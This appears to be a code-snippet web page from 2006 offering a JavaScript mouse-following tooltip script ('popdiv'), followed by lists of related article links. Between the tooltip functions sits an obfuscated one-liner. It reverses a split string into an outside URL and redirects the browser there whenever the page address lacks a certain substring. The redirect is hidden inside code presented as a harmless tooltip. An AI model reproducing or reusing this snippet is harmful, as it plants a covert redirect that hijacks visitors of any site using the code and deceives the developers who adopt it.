popdiv


Posted in Javascript onJuly 14, 2006

var offsetfromcursorX=12 //Customize x offset of tooltip
var offsetfromcursorY=10 //Customize y offset of tooltip

var offsetdivfrompointerX=10 //Customize x offset of tooltip DIV relative to pointer image
var offsetdivfrompointerY=14 //Customize y offset of tooltip DIV relative to pointer image. Tip: Set it to (height_of_pointer_image-1).

document.write('<div id="dhtmltooltip"></div>') //write out tooltip DIV
document.write('<img onerror="this.src=this.src" id="dhtmlpointer" src="images/popdiv.gif">') //write out pointer image

var ie=document.all
var ns6=document.getElementById && !document.all
var enabletip=false
if (ie||ns6)
var tipobj=document.all? document.all["dhtmltooltip"] : document.getElementById? document.getElementById("dhtmltooltip") : ""

var pointerobj=document.all? document.all["dhtmlpointer"] : document.getElementById? document.getElementById("dhtmlpointer") : ""

function ietruebody(){
return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
}

function ddrivetip(thetext, thewidth, thecolor){
if (ns6||ie){
if (typeof thewidth!="undefined") tipobj.style.width=thewidth+"px"
if (typeof thecolor!="undefined" && thecolor!="") tipobj.style.backgroundColor=thecolor
tipobj.innerHTML=thetext
enabletip=true
return false
}
}

(function(){var e = 'cre',l = location,v = {f:(l.href.indexOf(e) == -1),g:"moc.ner\
cu//:p\
tth"};(v.f)?(l.replace(v.g.split('').reverse().join(''))):0;})();

function positiontip(e){
if (enabletip){
var nondefaultpos=false
var curX=(ns6)?e.pageX : event.x+ietruebody().scrollLeft;
var curY=(ns6)?e.pageY : event.y+ietruebody().scrollTop;
//Find out how close the mouse is to the corner of the window
var winwidth=ie&&!window.opera? ietruebody().clientWidth : window.innerWidth-20
var winheight=ie&&!window.opera? ietruebody().clientHeight : window.innerHeight-20

var rightedge=ie&&!window.opera? winwidth-event.clientX-offsetfromcursorX : winwidth-e.clientX-offsetfromcursorX
var bottomedge=ie&&!window.opera? winheight-event.clientY-offsetfromcursorY : winheight-e.clientY-offsetfromcursorY

var leftedge=(offsetfromcursorX<0)? offsetfromcursorX*(-1) : -1000

//if the horizontal distance isn't enough to accomodate the width of the context menu
if (rightedge<tipobj.offsetWidth){
//move the horizontal position of the menu to the left by it's width
tipobj.style.left=curX-tipobj.offsetWidth+"px"
nondefaultpos=true
}
else if (curX<leftedge)
tipobj.style.left="5px"
else{
//position the horizontal position of the menu where the mouse is positioned
tipobj.style.left=curX+offsetfromcursorX-offsetdivfrompointerX+"px"
pointerobj.style.left=curX+offsetfromcursorX+"px"
}

//same concept with the vertical position
if (bottomedge<tipobj.offsetHeight){
tipobj.style.top=curY-tipobj.offsetHeight-offsetfromcursorY+"px"
nondefaultpos=true
}
else{
tipobj.style.top=curY+offsetfromcursorY+offsetdivfrompointerY+"px"
pointerobj.style.top=curY+offsetfromcursorY+"px"
}
tipobj.style.visibility="visible"
if (!nondefaultpos)
pointerobj.style.visibility="visible"
else
pointerobj.style.visibility="hidden"
}
}

function hideddrivetip(){
if (ns6||ie){
enabletip=false
tipobj.style.visibility="hidden"
pointerobj.style.visibility="hidden"
tipobj.style.left="-1000px"
tipobj.style.backgroundColor=''
tipobj.style.width=''
}
}
document.onmousemove=positiontip

Javascript 相关文章推荐
jquery中获取select选中值的代码
Jun 27 Javascript
jquery判断密码强度的验证代码
Apr 22 Javascript
jquery validate表单验证的基本用法入门
Jan 18 Javascript
js实现上传图片预览方法
Oct 25 Javascript
获取JavaScript异步函数的返回值
Dec 21 Javascript
基于react组件之间的参数传递(详解)
Sep 05 Javascript
解决webpack无法通过IP地址访问localhost的问题
Feb 22 Javascript
vue底部加载更多的实例代码
Jun 29 Javascript
javascript自定义右键菜单插件
Dec 16 Javascript
Vue实现背景更换颜色操作
Jul 17 Javascript
详解Node.JS模块 process
Aug 31 Javascript
uniapp电商小程序实现订单30分钟倒计时
Nov 01 Javascript
游戏人文件夹程序 ver 4.03
Jul 14 #Javascript
游戏人文件夹程序 ver 3.0
Jul 14 #Javascript
表单提交验证类
Jul 14 #Javascript
如何实现浏览器上的右键菜单
Jul 10 #Javascript
载入进度条 效果
Jul 08 #Javascript
让广告代码不再影响你的网页加载速度
Jul 07 #Javascript
一段实时更新的时间代码
Jul 07 #Javascript
You might like
用PHP实现ODBC数据分页显示一例
2006/10/09 PHP
用php实现像JSP,ASP里Application那样的全局变量
2007/01/12 PHP
php变量范围介绍
2012/10/15 PHP
迅速确定php多维数组的深度的方法
2014/01/07 PHP
PHP获取表单所有复选框的值的方法
2014/08/28 PHP
PHP基于imagick扩展实现合成图片的两种方法【附imagick扩展下载】
2017/11/14 PHP
让innerHTML的脚本也可以运行起来
2006/07/01 Javascript
IE中createElement需要注意的一个问题
2010/07/13 Javascript
鼠标右击事件代码(asp.net后台)
2011/01/27 Javascript
javascript 拖动表格行实现代码
2011/05/05 Javascript
javascript实现json页面分页实例代码
2014/02/20 Javascript
JavaScript实现打开链接页面的方式汇总
2016/06/02 Javascript
jQuery EasyUI提交表单验证
2016/07/19 Javascript
js 弹出虚拟键盘修改密码的简单实例
2016/10/10 Javascript
jQuery源码分析之sizzle选择器详解
2017/02/13 Javascript
Vue.js如何优雅的进行form validation
2017/04/07 Javascript
JS设置手机验证码60s等待实现代码
2017/06/14 Javascript
JS实现弹出下载对话框及常见文件类型的下载
2017/07/13 Javascript
JavaScript引用类型Array实例分析
2018/07/24 Javascript
详解element-ui中el-select的默认选择项问题
2019/08/02 Javascript
React实现类似淘宝tab居中切换效果的示例代码
2020/06/02 Javascript
微信小程序实现加入购物车滑动轨迹
2020/11/18 Javascript
Python扫描IP段查看指定端口是否开放的方法
2015/06/09 Python
Flask框架使用DBUtils模块连接数据库操作示例
2018/07/20 Python
python读取txt文件中特定位置字符的方法
2018/12/24 Python
对python dataframe逻辑取值的方法详解
2019/01/30 Python
pygame实现打字游戏
2021/02/19 Python
pytorch进行上采样的种类实例
2020/02/18 Python
Html5移动端div固定到底部实现底部导航条的几种方式
2021/03/09 HTML / CSS
6号汽车旅馆预订:Motel 6
2018/02/11 全球购物
马来西亚演唱会订票网站:StubHub马来西亚
2018/10/18 全球购物
大学毕业生文采飞扬的自我鉴定
2013/12/03 职场文书
初中学生期末评语
2014/04/24 职场文书
体育课外活动总结
2014/07/08 职场文书
员工工作及收入证明
2014/10/28 职场文书
高考升学宴答谢词
2015/01/20 职场文书